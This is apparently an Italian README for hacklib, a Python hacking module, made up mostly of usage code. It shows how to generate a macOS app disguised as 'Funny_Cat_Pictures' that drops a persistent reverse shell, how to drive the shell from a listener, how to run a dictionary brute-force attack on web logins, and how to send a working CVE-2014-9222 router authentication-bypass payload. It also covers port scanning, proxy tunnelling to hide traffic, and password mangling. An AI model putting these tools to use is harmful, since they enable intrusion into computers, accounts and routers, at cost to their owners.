
hacklib - pentesting, scansione delle porte e accesso ovunque con Python
hacklib è un modulo Python per appassionati di hacking interessati alla sicurezza di rete. Non è più in sviluppo attivo.
Per ottenere hacklib, basta eseguire nella riga di comando:
pip install hacklib
hacklib ha anche un'interfaccia utente. Per usarla, puoi fare una delle seguenti cose:
Scarica hacklib.py ed esegui nella console:
python hacklib.py
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Hey. What can I do you for?
Enter the number corresponding to your choice.
1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit
Oppure se lo hai installato con pip:
import hacklib
hacklib.userInterface()
Backdoor di reverse shell (Attualmente solo per Mac):
import hacklib
bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
App generata:
Ascolta le connessioni con Server:
>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen()
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!
Client di login universale per quasi tutti i login basati su form HTTP/HTTPS e login HTTP Basic Authentication:
import hacklib
ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')
# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'
# For logins using HTTP Basic Auth:
try:
htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed
Attacco dizionario semplice usando AuthClient:
import hacklib
ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)
for p in passwords:
htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
if htmldata and 'welcome' in htmldata.lower():
print 'Password is', p
break
Scansione delle porte:
from hacklib import *
ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default
# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
# Establish a TCP stream and sends a message
send(getIP('yourwebsite.com'), 80, message='GET / HTTP/1.0\r\n\r\n')
Exploit Misfortune Cookie (CVE-2014-9222) usando PortScanner:
>>> import hacklib
# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.
# Exploitation
>>> payload = '''GET / HTTP/1.0\r\n
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.
Autenticazione FTP:
import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
ftp.login('username', 'password')
except:
print 'Login failed.'
Scraping e tunneling di proxy Socks4/5
>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read()
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')
Mangling di parole:
from hacklib import *
word = Mangle("Test", 0, 10, 1990, 2016)
word.Leet()
word.Numbers()
word.Years()
Output:
T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test
Creazione Pattern:
from hacklib import *
Pattern = PatternCreate(100)
Pattern.generate()
Output:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Offset Pattern:
from hacklib import *
Offset = PatternOffset("6Ab7")
Offset.find()
Output:
[+] Offset: 50
Non tutte le classi hanno dipendenze esterne, ma per sicurezza puoi fare quanto segue:
hacklib.installDependencies()